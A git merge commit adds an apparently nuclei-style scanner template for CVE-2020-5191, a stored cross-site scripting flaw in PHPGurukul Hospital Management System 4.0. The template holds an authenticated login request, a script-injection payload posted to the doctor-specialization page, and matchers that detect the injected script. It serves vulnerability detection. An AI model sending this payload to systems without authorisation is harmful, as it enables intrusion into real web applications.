Merge pull request #5215 from TenBird-1/CVE-2020-5191

CVE 2020 5191
2022-08-30 11:17:52 +05:30 · 2022-08-30 11:17:52 +05:30 · 6f8558802c
parent aa33439009 ca9e41fe16
commit 6f8558802c
1 changed files with 51 additions and 0 deletions
--- a/cves/2020/CVE-2020-5191.yaml
+++ b/cves/2020/CVE-2020-5191.yaml
@ -0,0 +1,51 @@
+id: CVE-2020-5191
+
+info:
+  name: Hospital Management System 4.0 - Cross-Site Scripting
+  author: TenBird
+  severity: medium
+  description: |
+    PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
+  reference:
+    - https://www.exploit-db.com/exploits/47841
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
+  classification:
+    cve-id: CVE-2020-5191
+  metadata:
+    verified: true
+  tags: cve,cve2020,hms,cms,xss,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /hospital/hms/admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}&submit=&submit=
+
+      - |
+        POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
+
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<td class="hidden-xs"></td><script>alert(document.domain);</script><td>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200